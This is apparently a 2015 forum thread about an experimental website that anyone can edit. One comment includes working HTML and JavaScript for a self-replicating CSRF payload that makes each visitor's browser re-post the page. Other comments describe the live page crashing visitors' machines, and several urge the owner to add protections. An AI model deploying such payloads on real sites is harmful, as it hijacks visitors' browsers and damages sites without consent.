Ramarchy – a website anyone can edit (ramarchy.com)
12 points by zq on March 28, 2015 | hide | past | favorite | 10 comments



I would caution those with epilepsy to avoid the main page. It's being changed fairly regularly to a very quickly flashing background of multiple colors and flashing text.


You should probably do something to prevent CSRF. I just came up with this:

    <!-- Self-replicating CSRF payload: once this markup is saved as the page,
         every visitor's browser re-posts the page's own source after 1 s. -->
    <form id="lol" method="POST" action="http://edit.ramarchy.com/">
      <input type="hidden" name="route" value="/" />
      <input id="page" type="hidden" name="page" value="" />
    </form>
    <script>
    setTimeout(function() {
      // documentElement.innerHTML omits the <html> wrapper, so it is added back
      // (written as 'ht' + 'ml' so the script source contains no literal html tag).
      document.getElementById('page').value = '<ht' + 'ml>' + document.documentElement.innerHTML + '</ht' + 'ml>';
      document.getElementById("lol").submit();
    }, 1000);
    </script>


At least put some basic protection in place. There was a time when you could have launched this website without a problem, say 1995 or so. Today this is no longer possible.

To the dumbass downvoting me: I just took a look with wget and the current homepage will set you in a loop that starts up endless mailer windows until your machine crashes. Good luck.


It looks like it intentionally didn't have any protections in place. The edit page has the comment <!-- Feel free to take advantage of the lack of CSRF protection -->

It also has <h1>What could possibly go wrong.</h1> in the default editor source.

Was it irresponsible? Yes, zq should have put a warning for sure. Still a cool experiment. Twitch Plays Pokemon with bigger repercussions.


Seems like someone who uses LastPass got XSRF'd: view-source:http://ramarchy.com/


The source has changed since your post. If I use LastPass and visited the site, should I be worried? What did the script do?


The script grabbed document.documentElement.innerHTML and resubmitted it as the new page contents. See my post above regarding CSRF.


This will be fun until 4chan/8chan find it.


Ha yeah. It is an experiment. I'm wondering how long it will last before someone drops an XSRF or something. Will probably have to take it down within the hour. I'm thinking about only letting users' posts go through if their hash is lower than the previous user's hash submission.

Hopefully it is legal.


I'm not worried about you getting in trouble, I'm worried about those that visit your site.

Shut it down until you understand the basics of operating a site that 'anyone can edit', fix the problems and then re-launch. This is simply asking for misery, and not just yours.



